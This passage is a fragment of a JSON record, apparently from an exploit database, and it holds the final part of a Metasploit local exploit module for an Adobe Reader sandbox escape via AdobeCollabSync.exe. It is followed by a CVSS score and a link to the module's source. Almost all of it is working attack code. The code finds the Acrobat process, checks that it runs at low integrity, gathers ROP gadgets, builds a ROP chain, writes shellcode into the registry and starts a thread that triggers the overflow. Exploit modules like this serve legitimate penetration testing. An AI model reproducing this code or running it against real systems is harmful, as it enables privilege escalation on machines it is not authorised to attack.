Registry\")\n end\n end\n\n def trigger_overflow\n vprint_status(\"Creating the thread to trigger the Overflow on AdobeCollabSync.exe...\")\n # Create a thread in order to execute the necessary code to launch AdobeCollabSync\n ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, \"CREATE_SUSPENDED\", nil)\n if ret['return'] < 1\n print_error(\"Unable to CreateThread\")\n return\n end\n hthread = ret['return']\n\n vprint_status(\"Resuming the Thread...\")\n # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!\n ret = client.railgun.kernel32.ResumeThread(hthread)\n if ret['return'] < 1\n fail_with(Failure::Unknown, \"Unable to ResumeThread\")\n end\n end\n\n def check\n @addresses = {}\n acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\")\n @addresses['AcroRd32.exe'] = acrord32[\"return\"]\n if @addresses['AcroRd32.exe'] == 0\n return Msf::Exploit::CheckCode::Unknown\n elsif check_trigger\n return Msf::Exploit::CheckCode::Vulnerable\n else\n return Msf::Exploit::CheckCode::Detected\n end\n end\n\n def exploit\n @addresses = {}\n @gadgets = {}\n\n print_status(\"Verifying we're in the correct target process...\")\n acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\")\n @addresses['AcroRd32.exe'] = acrord32[\"return\"]\n if @addresses['AcroRd32.exe'] == 0\n fail_with(Failure::NoTarget, \"AcroRd32.exe process not found\")\n end\n vprint_good(\"AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}\")\n\n print_status(\"Checking the AcroRd32.exe image...\")\n if not check_trigger\n fail_with(Failure::NoTarget, \"Please check the target, the AcroRd32.exe process doesn't match with the target\")\n end\n\n print_status(\"Checking the Process Integrity Level...\")\n if not low_integrity_level?\n fail_with(Failure::NoTarget, \"Looks like you don't need this Exploit since you're already enjoying Medium Level\")\n end\n\n print_status(\"Collecting necessary addresses for exploit...\")\n collect_addresses\n\n print_status(\"Searching the gadgets needed to build the ROP chain...\")\n search_gadgets\n print_good(\"Gadgets collected...\")\n\n print_status(\"Building the ROP chain...\")\n buf = create_rop_chain\n print_good(\"ROP chain ready...\")\n\n print_status(\"Storing the shellcode and the trigger in the Registry...\")\n store_data_registry(buf)\n\n print_status(\"Executing AdobeCollabSync.exe...\")\n trigger_overflow\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb"}]}